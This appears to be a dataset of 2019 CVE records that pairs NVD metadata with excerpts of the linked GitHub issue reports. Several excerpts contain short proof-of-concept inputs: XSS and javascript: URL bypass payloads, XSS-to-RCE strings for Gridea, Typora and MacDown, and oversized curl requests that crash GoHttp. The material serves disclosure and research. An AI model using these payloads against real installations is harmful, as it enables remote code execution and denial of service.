[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1691529" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/golang/go/issues/30965" },...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:golang:crypto:*:*:*:*:*:*:*:*", "matchCriteriaId": "FBA1D5EA-C8A7-40C2-9D8E-7E1ECF8ADE80", "versionEndExcluding": "2019-03-20", "versionEndIncluding": null, "versionStartExcl...
[ "330" ]
330
https://github.com/golang/go/issues/30965
[ "Third Party Advisory" ]
github.com
[ "golang", "go" ]
If more than 256 GiB of keystream is generated, or if the counter otherwise grows greater than 32 bits, the amd64 implementation will first generate incorrect output, and then cycle back to previously generated keystream. Repeated keystream bytes can lead to loss of confidentiality in encryption applications, or to pre...
x/crypto/salsa20: keystream loop in amd64 implementation after 256GiB
https://api.github.com/repos/golang/go/issues/30965/comments
3
2019-03-20T22:32:56Z
2020-05-09T07:00:19Z
https://github.com/golang/go/issues/30965
423,501,989
30,965
378
CVE-2019-11870
2019-05-09T23:29:00.293
Serendipity before 2.1.5 has XSS via EXIF data that is mishandled in the templates/2k11/admin/media_choose.tpl Editor Preview feature or the templates/2k11/admin/media_items.tpl Media Library feature.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2019/05/10/1" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://blog.s9y.org/a...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:s9y:serendipity:*:*:*:*:*:*:*:*", "matchCriteriaId": "D88431A4-EC0F-46BE-BD1C-C5EE98AE1B26", "versionEndExcluding": "2.1.5", "versionEndIncluding": null, "versionStartExcludi...
[ "79" ]
79
https://github.com/s9y/Serendipity/issues/598
[ "Third Party Advisory" ]
github.com
[ "s9y", "Serendipity" ]
The attached file contains an XSS payload as the camera model EXIF tag. Uploading it to s9y and looking at the details of the file will execute. The exif tag printing should be escaped. (While this is only self-xss, there are situations where this could still be exploited, imagine someone sending a photo to someone ...
XSS via exiftag
https://api.github.com/repos/s9y/Serendipity/issues/598/comments
8
2019-03-07T14:35:55Z
2019-04-27T10:58:15Z
https://github.com/s9y/Serendipity/issues/598
418,342,707
598
379
CVE-2019-11082
2019-05-10T16:29:01.673
core/api/datasets/internal/actions/Explode.java in the Dataset API in DKPro Core through 1.10.0 allows Directory Traversal, resulting in the overwrite of local files with the contents of an archive.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/dkpro/dkpro-core/issues/1325" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dkpro-core_project:dkpro-core:*:*:*:*:*:*:*:*", "matchCriteriaId": "CAA6385C-9C36-437B-B006-D101506CD5AC", "versionEndExcluding": null, "versionEndIncluding": "1.10.0", "vers...
[ "22" ]
22
https://github.com/dkpro/dkpro-core/issues/1325
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "dkpro", "dkpro-core" ]
It should be ensured that datasets are only extracted inside their respective cache folder.
Avoid datasets being extracted outside their target directory
https://api.github.com/repos/dkpro/dkpro-core/issues/1325/comments
0
2019-02-12T13:00:10Z
2019-04-16T10:07:48Z
https://github.com/dkpro/dkpro-core/issues/1325
409,285,883
1,325
380
CVE-2019-12041
2019-05-13T13:29:02.243
lib/common/html_re.js in remarkable 1.7.1 allows Regular Expression Denial of Service (ReDoS) via a CDATA section.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jonschlinkert/remarkable/issues/331" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remarkable_project:remarkable:1.7.1:*:*:*:*:node.js:*:*", "matchCriteriaId": "EBD1C278-8330-40CA-B276-F646A2419E00", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "1333" ]
1333
https://github.com/jonschlinkert/remarkable/issues/331
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jonschlinkert", "remarkable" ]
If you guys are not familiar with this type of bug, here is the detail explanation: https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS Vulnerable line of code: https://github.com/jonschlinkert/remarkable/blob/master/lib/common/html_re.js#L47 PoC ```javascript var Remarkable = require...
[Security] Regex DoS vulnerability in parsing html tag
https://api.github.com/repos/jonschlinkert/remarkable/issues/331/comments
3
2019-05-13T10:39:02Z
2019-07-27T19:07:27Z
https://github.com/jonschlinkert/remarkable/issues/331
443,326,869
331
381
CVE-2019-12043
2019-05-13T14:29:01.987
In remarkable 1.7.1, lib/parser_inline.js mishandles URL filtering, which allows attackers to trigger XSS via unprintable characters, as demonstrated by a \x0ejavascript: URL.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jonschlinkert/remarkable/issues/332" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https:...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remarkable_project:remarkable:1.7.1:*:*:*:*:*:*:*", "matchCriteriaId": "DA15E926-6695-47EF-9683-D55988A8C0FD", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "79" ]
79
https://github.com/jonschlinkert/remarkable/issues/332
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jonschlinkert", "remarkable" ]
Hi, check out this reported issue https://github.com/jonschlinkert/remarkable/issues/227 Im able to bypass the bad url check, implemented here https://github.com/jonschlinkert/remarkable/blob/master/lib/parser_inline.js#L146 ```javascript var Remarkable = require('remarkable'); var md = new Remarkable(); c...
[Security] bad url bypass, could lead to XSS
https://api.github.com/repos/jonschlinkert/remarkable/issues/332/comments
6
2019-05-13T12:15:57Z
2019-07-27T19:05:06Z
https://github.com/jonschlinkert/remarkable/issues/332
443,365,966
332
382
CVE-2019-12047
2019-05-13T15:29:03.613
Gridea v0.8.0 has an XSS vulnerability through which the Nodejs module can be called to achieve arbitrary code execution, as demonstrated by child_process.exec and the "<img src=# onerror='eval(new Buffer(" substring.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/getgridea/gridea/issues/105" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gridea:gridea:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "9CADBEF5-C0D0-4A47-8E33-3B54249DD491", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "79" ]
79
https://github.com/getgridea/gridea/issues/105
[ "Exploit", "Third Party Advisory" ]
github.com
[ "getgridea", "gridea" ]
Hi, I found an XSS vulnerability that can cause RCE. And I recorded a [GIF](https://imgur.com/a/KI8RQbg) to demonstrate controlling the local win10 through this vulnerability. ### Cause of vulnerability The post content editing area does not filter or prevent the running of js script, resulting in the use of XS...
Vulnerability: XSS to RCE
https://api.github.com/repos/getgridea/gridea/issues/105/comments
4
2019-05-13T05:48:39Z
2019-07-15T09:30:09Z
https://github.com/getgridea/gridea/issues/105
443,215,763
105
383
CVE-2019-12101
2019-05-15T05:29:00.197
coap_decode_option in coap.c in LibNyoci 0.07.00rc1 mishandles certain packets with "Uri-Path: (null)" and consequently allows remote attackers to cause a denial of service (segmentation fault).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/darconeous/libnyoci/issues/21" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gith...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libnyoci_project:libnyoci:0.07.00:rc1:*:*:*:*:*:*", "matchCriteriaId": "3313B1A6-57C6-44FA-ACE7-B9E0C3CC41C0", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "476" ]
476
https://github.com/darconeous/libnyoci/issues/21
[ "Exploit", "Third Party Advisory" ]
github.com
[ "darconeous", "libnyoci" ]
src/libnyoci/coap.c lines 58-116: len = (*buffer & 0x0F); switch((*buffer >> 4)) { default: if(key) *key += (*buffer >> 4); buffer += 1; break; case 13: buffer += 1; if(key)*key += 13+*buffer; buffer += 1; break; case 14: buffer += 1; if(key)*key += 269+buffer[1]...
There is a logical defect that causes a denial of service vulnerability
https://api.github.com/repos/darconeous/libnyoci/issues/21/comments
6
2019-05-14T15:18:38Z
2019-05-25T00:45:31Z
https://github.com/darconeous/libnyoci/issues/21
443,976,528
21
384
CVE-2019-1010258
2019-05-15T18:29:00.263
nanosvg library nanosvg after commit c1f6e209c16b18b46aa9f45d7e619acf42c29726 is affected by: Buffer Overflow. The impact is: Memory corruption leading to at least DoS. More severe impact vectors need more investigation. The component is: it's part of a svg processing library. function nsvg__parseColorRGB in src/nanosv...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "josh@bress.net", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://0day.work/cve-2019-1000032-memory-corruption-in-nanosvg/" }, { "source": "josh@bress.net", "tags": [ "Third Party Advisory" ], "url": "https://github.com/memononen/nanos...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nanosvg_project:nanosvg:-:*:*:*:*:*:*:*", "matchCriteriaId": "C22B5C89-A38B-4132-B90F-A58EEC770141", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
[ "787" ]
787
https://github.com/memononen/nanosvg/issues/136
[ "Exploit", "Third Party Advisory" ]
github.com
[ "memononen", "nanosvg" ]
This simple Proof of Concept ```svg <stop style="stop-color:rgb(0%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%)"/> ``` crashes nanosvg. In this snippet it is clear why this happens: ```c #include <stdio.h> #include <string.h> static unsigned int nsvg__...
CVE-2019-1000032 - Memory corruption bug in nsvg__parseColorRGB
https://api.github.com/repos/memononen/nanosvg/issues/136/comments
13
2018-11-16T15:09:47Z
2021-09-03T18:25:59Z
https://github.com/memononen/nanosvg/issues/136
381,637,983
136
385
CVE-2019-12136
2019-05-16T03:29:00.673
There is XSS in BoostIO Boostnote 0.11.15 via a label named mermaid, as demonstrated by a crafted SRC attribute of an IFRAME element.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/BoostIO/Boostnote/issues/3007" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:boostio:boostnote:0.11.15:*:*:*:*:*:*:*", "matchCriteriaId": "DA6F562F-BC2D-4DF8-BCAC-2DCCF3C29938", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
[ "79" ]
79
https://github.com/BoostIO/Boostnote/issues/3007
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "BoostIO", "Boostnote" ]
<!-- Issuehunt Badges --> [<img alt="Issuehunt badges" src="https://img.shields.io/badge/IssueHunt-%2440%20Rewarded-%237E24E3.svg" />](https://issuehunt.io/r/BoostIo/Boostnote/issues/3007) <!-- /Issuehunt Badges --> # XSS There is a xss in the newest version via a label named `mermaid` When we insert codes like th...
A xss on the newest version
https://api.github.com/repos/BoostIO/BoostNote-Legacy/issues/3007/comments
6
2019-05-14T03:56:09Z
2020-02-16T17:43:47Z
https://github.com/BoostIO/BoostNote-Legacy/issues/3007
443,698,464
3,007
386
CVE-2019-12137
2019-05-16T14:29:00.310
Typora 0.9.9.24.6 on macOS allows directory traversal, for execution of arbitrary programs, via a file:/// or ../ substring in a shared note.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://packetstormsecurity.com/files/153082/Typora-0.9.9.24.6-Directory-Traversal.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/typora/typora-issues/issues...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:typora:typora:0.9.9.24.6:*:*:*:*:*:*:*", "matchCriteriaId": "D21E894E-B778-4B69-A17A-1574E1BDB639", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "22" ]
22
https://github.com/typora/typora-issues/issues/2505
[ "Exploit", "Third Party Advisory" ]
github.com
[ "typora", "typora-issues" ]
## Summary A local file path traversal issue exists in Typora version 0.9.9.24.6 (2400) for macOS which allows an attacker to execute arbitrary programs. ## Technical observation A crafted URI can be used in a note to perform this attack using file:/// as an argument or by traversing to any directory like (../../...
Code Execution in Typora
https://api.github.com/repos/typora/typora-issues/issues/2505/comments
3
2019-05-16T09:20:24Z
2019-06-12T21:46:59Z
https://github.com/typora/typora-issues/issues/2505
444,845,103
2,505
387
CVE-2019-12138
2019-05-16T14:29:00.513
MacDown 0.7.1 allows directory traversal, for execution of arbitrary programs, via a file:/// or ../ substring in a shared note.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/MacDownApp/macdown/issues/1076" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://git...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:macdown_project:macdown:0.7.1:*:*:*:*:*:*:*", "matchCriteriaId": "C9DE0D4A-C68A-41D7-885D-B543E72D72AD", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
[ "22" ]
22
https://github.com/MacDownApp/macdown/issues/1076
[ "Exploit", "Third Party Advisory" ]
github.com
[ "MacDownApp", "macdown" ]
## Summary A local file path traversal issue exists in Macdown version 0.7.1 for macOS which allows an attacker to execute arbitrary programs. ## Technical observation A crafted URI can be used in a note to perform this attack using file:/// as an argument or by traversing to any directory like (../../../../someth...
Code Execution in Macdown
https://api.github.com/repos/MacDownApp/macdown/issues/1076/comments
1
2019-05-16T09:58:31Z
2019-05-16T17:33:59Z
https://github.com/MacDownApp/macdown/issues/1076
444,863,620
1,076
388
CVE-2019-12086
2019-05-17T17:29:00.483
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a cra...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.secur...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "7036DA13-110D-40B3-8494-E361BBF4AFCD", "versionEndExcluding": "2.6.7.3", "versionEndIncluding": null, "versio...
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2326
[ "Patch", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
A new gadget type (see https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062) was reported, and CVE id allocated was `CVE-2019-12086`. CVE description is available at: https://nvd.nist.gov/vuln/detail/CVE-2019-12086 for full details, but the specific variation (in addit...
Block one more gadget type (mysql, CVE-2019-12086)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2326/comments
12
2019-05-11T17:31:34Z
2019-10-16T04:36:08Z
https://github.com/FasterXML/jackson-databind/issues/2326
443,018,345
2,326
389
CVE-2019-12158
2019-05-17T19:29:00.620
GoHTTP through 2017-07-25 has a GetExtension heap-based buffer overflow via a long extension.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/fekberg/GoHttp/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/fekberg/GoHttp/issues/17" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gohttp_project:gohttp:*:*:*:*:*:*:*:*", "matchCriteriaId": "AA61125C-0405-4672-892D-3E198E9B895F", "versionEndExcluding": null, "versionEndIncluding": "2017-07-25", "versionS...
[ "787" ]
787
https://github.com/fekberg/GoHttp/issues/17
[ "Third Party Advisory" ]
github.com
[ "fekberg", "GoHttp" ]
Screen -S Server ./GoHTTP CTRL-A, D Screen -S Crash curl 127.0.0.1:4000/hi.htmlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA CTRL-A, D ASAN Details: ==9376==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efbb at pc 0x000000402e44 bp 0x7 ffd9e6f3a70 sp 0x7ffd9e6f3a60 WRITE of size 1 at 0x60200...
Heap Buffer Overflow when appending certain size string to URL file extension when compiled with ASAN.
https://api.github.com/repos/fekberg/GoHttp/issues/17/comments
4
2019-05-17T06:16:24Z
2020-04-22T11:27:40Z
https://github.com/fekberg/GoHttp/issues/17
445,281,406
17
390
CVE-2019-12159
2019-05-17T19:29:00.680
GoHTTP through 2017-07-25 has a stack-based buffer over-read in the scan function (when called from getRequestType) via a long URL.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/fekberg/GoHttp/issues/16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/fekberg/GoHttp/issues/16" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gohttp_project:gohttp:*:*:*:*:*:*:*:*", "matchCriteriaId": "AA61125C-0405-4672-892D-3E198E9B895F", "versionEndExcluding": null, "versionEndIncluding": "2017-07-25", "versionS...
[ "125" ]
125
https://github.com/fekberg/GoHttp/issues/16
[ "Third Party Advisory" ]
github.com
[ "fekberg", "GoHttp" ]
Screen -S Server ./GoHTTP CTRL-A, D Screen -S Crash python -c "print 'A' * 50000" > file curl 127.0.0.1:4000/$(cat file) CTRL-A, D Screen -R Server ==9330==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffcea552b20 at pc 0x7fcfe397420b bp 0x 7ffcea552850 sp 0x7ffcea551ff8 READ of size 519 at 0...
Stack Buffer Overflow when requesting excessively long URL when compiled with ASAN.
https://api.github.com/repos/fekberg/GoHttp/issues/16/comments
2
2019-05-17T06:11:38Z
2019-05-24T19:00:10Z
https://github.com/fekberg/GoHttp/issues/16
445,280,173
16
391
CVE-2019-12160
2019-05-17T19:29:00.743
GoHTTP through 2017-07-25 has a sendHeader use-after-free.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/fekberg/GoHttp/issues/15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.co...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gohttp_project:gohttp:*:*:*:*:*:*:*:*", "matchCriteriaId": "AA61125C-0405-4672-892D-3E198E9B895F", "versionEndExcluding": null, "versionEndIncluding": "2017-07-25", "versionS...
[ "416" ]
416
https://github.com/fekberg/GoHttp/issues/15
[ "Exploit", "Third Party Advisory" ]
github.com
[ "fekberg", "GoHttp" ]
Steps to reproduce: Compile GoHTTP Server (GCC and ASAN flags/LIBS). Screen -S server cd GoHTTP ./GoHTTP CTRL-A, D (Detach from session) Screen -S Request curl 127.0.0.1:$runningport/hi.html CTRL-A, D Screen -R server Dump: ==9215==ERROR: AddressSanitizer: heap-use-after-free on address 0x611000009dc0...
Heap Use-After-Free Notification when compiling with ASAN on Ubuntu 16 GCC 5.4
https://api.github.com/repos/fekberg/GoHttp/issues/15/comments
5
2019-05-17T06:04:40Z
2019-05-29T18:15:53Z
https://github.com/fekberg/GoHttp/issues/15
445,278,436
15
392
CVE-2019-12172
2019-05-17T23:29:00.237
Typora 0.9.9.21.1 (1913) allows arbitrary code execution via a modified file: URL syntax in the HREF attribute of an AREA element, as demonstrated by file:\\\ on macOS or Linux, or file://C| on Windows. This is different from CVE-2019-12137.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/typora/typora-issues/issues/2166" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://g...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:typora:typora:0.9.9.21.1:*:*:*:*:*:*:*", "matchCriteriaId": "847DE287-AB48-4DDA-AFAC-63CFF0749DCC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "22" ]
22
https://github.com/typora/typora-issues/issues/2166
[ "Exploit", "Third Party Advisory" ]
github.com
[ "typora", "typora-issues" ]
## Typora Version 0.9.9.21.1 (1913) Remote Code Execution Vulnerability ### Description: Typora fails to sanitize input on HTML attributes. Abusing the ` file:\\` URI scheme on HTML attributes can result in arbitrary code execution. The below proof of concepts will execute calculator when opened inside of Typora ...
Typora Version 0.9.9.21.1 (1913) Remote Code Execution Vulnerability
https://api.github.com/repos/typora/typora-issues/issues/2166/comments
3
2019-02-07T20:05:43Z
2019-02-17T13:28:20Z
https://github.com/typora/typora-issues/issues/2166
407,875,218
2,166
393
CVE-2019-12173
2019-05-18T00:29:00.250
MacDown 0.7.1 (870) allows remote code execution via a file:\\\ URI, with a .app pathname, in the HREF attribute of an A element. This is different from CVE-2019-12138.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/MacDownApp/macdown/issues/1050" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://git...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:macdown_project:macdown:0.7.1:*:*:*:*:*:*:*", "matchCriteriaId": "C9DE0D4A-C68A-41D7-885D-B543E72D72AD", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
[ "22" ]
22
https://github.com/MacDownApp/macdown/issues/1050
[ "Exploit", "Third Party Advisory" ]
github.com
[ "MacDownApp", "macdown" ]
## Macdown Version 0.7.1 (870) Remote Code Execution Macdown version 0.7.1 (870) is affected by a remote code execution vulnerability. Macdown fails to sanitize input on HTML attributes. Abusing the`file:\\` URI scheme on HTML attributes can result in arbitrary code execution. The attached proof of concept will exec...
Macdown Version 0.7.1 (870) Remote Code Execution
https://api.github.com/repos/MacDownApp/macdown/issues/1050/comments
7
2019-01-28T02:45:54Z
2020-12-11T01:05:21Z
https://github.com/MacDownApp/macdown/issues/1050
403,630,763
1,050
394
CVE-2019-12198
2019-05-20T04:29:00.810
In GoHttp through 2017-07-25, there is a stack-based buffer over-read via a long User-Agent header.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/fekberg/GoHttp/issues/18" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gohttp_project:gohttp:*:*:*:*:*:*:*:*", "matchCriteriaId": "50E70401-8EBD-4579-B203-317F1863D27C", "versionEndExcluding": null, "versionEndIncluding": "20170725", "versionSta...
[ "125" ]
125
https://github.com/fekberg/GoHttp/issues/18
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "fekberg", "GoHttp" ]
<pre><font color="#EF2929"><b>root@0xGotcha</b></font>:<font color="#729FCF"><b>~/fuzzing/GoHttp</b></font># curl -A &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
stack-buffer-overflow 619 characters in User-Agent string causes stack-overflow.
https://api.github.com/repos/fekberg/GoHttp/issues/18/comments
2
2019-05-19T18:57:53Z
2019-05-20T11:57:08Z
https://github.com/fekberg/GoHttp/issues/18
445,852,089
18
395
CVE-2019-12206
2019-05-20T14:29:00.697
njs through 0.3.1, used in NGINX, has a heap-based buffer overflow in nxt_utf8_encode in nxt_utf8.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
